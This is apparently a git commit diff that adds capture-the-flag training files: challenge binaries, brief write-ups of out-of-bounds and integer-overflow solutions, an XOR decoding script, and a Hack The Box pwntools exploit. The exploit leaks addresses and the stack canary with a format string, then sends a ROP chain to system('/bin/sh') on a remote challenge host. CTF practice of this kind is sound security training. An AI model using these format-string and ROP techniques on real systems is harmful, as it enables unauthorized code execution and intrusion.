changed repo structure
This commit is contained in:
BIN
training/ForeverCTF/gdb/gdb_exec
Executable file
BIN
training/ForeverCTF/gdb/gdb_exec
Executable file
Binary file not shown.
BIN
training/ForeverCTF/jump/input
Normal file
BIN
training/ForeverCTF/jump/input
Normal file
Binary file not shown.
BIN
training/ForeverCTF/jump/jump
Executable file
BIN
training/ForeverCTF/jump/jump
Executable file
Binary file not shown.
BIN
training/ForeverCTF/overflow/overflow
Executable file
BIN
training/ForeverCTF/overflow/overflow
Executable file
Binary file not shown.
1
training/ForeverCTF/simple_checker/guesses.txt
Normal file
1
training/ForeverCTF/simple_checker/guesses.txt
Normal file
@@ -0,0 +1 @@
|
||||
flag = utflag{simple}
|
||||
1
training/ForeverCTF/tricky_indices/flag.txt
Normal file
1
training/ForeverCTF/tricky_indices/flag.txt
Normal file
@@ -0,0 +1 @@
|
||||
bullshit_flag
|
||||
BIN
training/ForeverCTF/tricky_indices/trickyindices
Executable file
BIN
training/ForeverCTF/tricky_indices/trickyindices
Executable file
Binary file not shown.
5
training/ForeverCTF/tricky_indices/writeup.md
Normal file
5
training/ForeverCTF/tricky_indices/writeup.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Tricky Indices
|
||||
|
||||
To exploit this binary enter -112 as the first index and -12 as the second index.
|
||||
This dumps the flag because no bounds were checked and the flag is located below
|
||||
the flag in memory
|
||||
1
training/ForeverCTF/uint64_t/.gdb_history
Normal file
1
training/ForeverCTF/uint64_t/.gdb_history
Normal file
@@ -0,0 +1 @@
|
||||
q
|
||||
BIN
training/ForeverCTF/uint64_t/a.out
Executable file
BIN
training/ForeverCTF/uint64_t/a.out
Executable file
Binary file not shown.
11
training/ForeverCTF/uint64_t/writeup.md
Normal file
11
training/ForeverCTF/uint64_t/writeup.md
Normal file
@@ -0,0 +1,11 @@
|
||||
# uint64_t challange
|
||||
|
||||
Observations:
|
||||
Current balance is stored as a uint64_t
|
||||
There is no check if you have enough money to buy a doge.
|
||||
|
||||
Exploit Path:
|
||||
1. Buy dodges until u get uint64_MAX ammount of money.
|
||||
2. Buy the win
|
||||
3. get the flag with `cat /flag.txt`
|
||||
|
||||
9
training/ForeverCTF/xor/decrypt_binary.py
Normal file
9
training/ForeverCTF/xor/decrypt_binary.py
Normal file
@@ -0,0 +1,9 @@
|
||||
import sys
|
||||
|
||||
binary = bytearray(open(sys.argv[1], 'rb').read())
|
||||
size = len(binary)
|
||||
|
||||
for i in range (size):
|
||||
binary[i] = binary[i] ^ 0x41
|
||||
|
||||
open(sys.argv[2], 'wb').write(binary)
|
||||
BIN
training/ForeverCTF/xor/decrypted_xor
Normal file
BIN
training/ForeverCTF/xor/decrypted_xor
Normal file
Binary file not shown.
BIN
training/ForeverCTF/xor/xor
Executable file
BIN
training/ForeverCTF/xor/xor
Executable file
Binary file not shown.
BIN
training/challenges.re/e12
Normal file
BIN
training/challenges.re/e12
Normal file
Binary file not shown.
BIN
training/challenges.re/e12.i64
Normal file
BIN
training/challenges.re/e12.i64
Normal file
Binary file not shown.
BIN
training/crackme/snake
Executable file
BIN
training/crackme/snake
Executable file
Binary file not shown.
BIN
training/crackme/snake.i64
Normal file
BIN
training/crackme/snake.i64
Normal file
Binary file not shown.
1
training/htb/.gitignore
vendored
Normal file
1
training/htb/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
||||
*.ovpn
|
||||
BIN
training/htb/challenges/pwn/what_does_the_f_say/core
Normal file
BIN
training/htb/challenges/pwn/what_does_the_f_say/core
Normal file
Binary file not shown.
62
training/htb/challenges/pwn/what_does_the_f_say/exploit.py
Normal file
62
training/htb/challenges/pwn/what_does_the_f_say/exploit.py
Normal file
@@ -0,0 +1,62 @@
|
||||
from pwn import *
|
||||
|
||||
def pop_rdi(binary_base, value):
|
||||
payload = p64(binary_base + 0x18bb)
|
||||
payload += p64(value)
|
||||
return payload
|
||||
|
||||
def scan_money(p, start):
|
||||
log.debug(p.clean().decode())
|
||||
p.sendline(b"1")
|
||||
log.debug("Sending 1")
|
||||
log.debug(p.clean().decode())
|
||||
log.debug("Sending 2")
|
||||
p.sendline(b"2")
|
||||
log.debug(p.clean().decode())
|
||||
payload = "|".join(["%{}$p".format(i) for i in range(start,start+3)])
|
||||
log.debug(f"Sending payload: {payload}")
|
||||
p.sendline(payload.encode())
|
||||
leak = p.clean().split(b"|")
|
||||
log.debug(leak)
|
||||
index_message = leak[2].find(b"\n\n")
|
||||
if b"You have less than 20 space rocks! Are you sure you want to buy it?" in leak[2][index_message:]:
|
||||
p.sendline(b"no.")
|
||||
log.debug(p.clean().decode())
|
||||
leak[2] = leak[2][:leak[2].find(b"\n\n")]
|
||||
|
||||
return leak
|
||||
|
||||
|
||||
with remote("167.99.85.216", 31511) as p:
|
||||
#with process("./what_does_the_f_say_patched") as p:
|
||||
leaks = []
|
||||
for i in range(8):
|
||||
print(f"\rScanning {i*3}-{i*3+2}", end="")
|
||||
leaks += scan_money(p, i * 3)
|
||||
|
||||
print(leaks)
|
||||
leaked_libc_addr = int(leaks[3], 16)
|
||||
libc_base = leaked_libc_addr - 0x110191
|
||||
canary = int(leaks[13], 16)
|
||||
leaked_binary_addr = int(leaks[15], 16)
|
||||
binary_base = leaked_binary_addr - 0x174a
|
||||
print(f"__GI___libc_read: {hex(leaked_libc_addr)}")
|
||||
print(f"libc base: {hex(libc_base)}")
|
||||
print(f"canary: {hex(canary)}")
|
||||
print(f"leaked_binary_addr: {hex(leaked_binary_addr)}")
|
||||
print(f"binary_base: {hex(binary_base)}")
|
||||
p.sendline(b"1")
|
||||
p.clean()
|
||||
p.sendline(b"2")
|
||||
p.clean()
|
||||
p.sendline(b"1")
|
||||
print(p.clean())
|
||||
execve_addr = libc_base + 0xe4e90
|
||||
puts_libc_addr = libc_base + 0x080a30
|
||||
bin_sh_string_addr = libc_base + 0x1b40fa
|
||||
system_addr = libc_base + 0x04f4e0
|
||||
payload = b"\x90" * 0x18 + p64(canary) + p64(0xdeadbeefdeadbeef) + pop_rdi(binary_base, bin_sh_string_addr) + p64(binary_base + 0x1016) + p64(system_addr)
|
||||
log.info(payload)
|
||||
log.info(len(payload))
|
||||
p.sendline(payload)
|
||||
p.interactive()
|
||||
BIN
training/htb/challenges/pwn/what_does_the_f_say/ld-2.27.so
Executable file
BIN
training/htb/challenges/pwn/what_does_the_f_say/ld-2.27.so
Executable file
Binary file not shown.
1
training/htb/challenges/pwn/what_does_the_f_say/libc.so.6
Symbolic link
1
training/htb/challenges/pwn/what_does_the_f_say/libc.so.6
Symbolic link
@@ -0,0 +1 @@
|
||||
libc6_2.27-3ubuntu1.2_amd64.so
|
||||
Binary file not shown.
BIN
training/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say
Executable file
BIN
training/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say
Executable file
Binary file not shown.
BIN
training/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say_patched
Executable file
BIN
training/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say_patched
Executable file
Binary file not shown.
Binary file not shown.
BIN
training/htb/challenges/pwn/you_know_0xDiabolos/vuln
Normal file
BIN
training/htb/challenges/pwn/you_know_0xDiabolos/vuln
Normal file
Binary file not shown.
BIN
training/htb/challenges/pwn/you_know_0xDiabolos/vuln.bndb
Normal file
BIN
training/htb/challenges/pwn/you_know_0xDiabolos/vuln.bndb
Normal file
Binary file not shown.
1
training/htb/labs/.gitignore
vendored
Normal file
1
training/htb/labs/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
||||
sherlock
|
||||
Reference in New Issue
Block a user